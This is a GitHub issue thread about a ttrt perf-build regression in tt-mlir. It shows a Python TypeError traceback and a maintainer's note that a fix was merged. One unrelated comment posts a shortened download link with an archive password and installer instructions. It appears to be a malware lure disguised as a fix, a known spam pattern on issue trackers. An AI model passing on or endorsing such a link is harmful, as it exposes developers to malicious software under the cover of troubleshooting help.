### ISSUE TITLE
Regression on perf build for ttrt

### ISSUE THREAD

**Issue by tapspatel** [tenstorrent/tt-mlir#512]
```
Traceback (most recent call last):
  File "/__w/tt-mlir/tt-mlir/whls_env/bin/ttrt", line 8, in <module>
    sys.exit(main())
  File "/__w/tt-mlir/tt-mlir/whls_env/lib/python3.10/site-packages/ttrt/__init__.py", line 42, in main
    request_api()
  File "/__w/tt-mlir/tt-mlir/whls_env/lib/python3.10/site-packages/ttrt/common/api.py", line 1378, in __call__
    self.check_constraints()
  File "/__w/tt-mlir/tt-mlir/whls_env/lib/python3.10/site-packages/ttrt/common/api.py", line 1095, in check_constraints
    if "binary" not in self:
  File "/__w/tt-mlir/tt-mlir/whls_env/lib/python3.10/site-packages/ttrt/common/api.py", line 1369, in __getitem__
    return getattr(self, key)
TypeError: getattr(): attribute name must be string
```

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by tapspatel** [comment]
merged: e1ccf6f06162ea84df8d89c0cca7a17a93bbd3e9
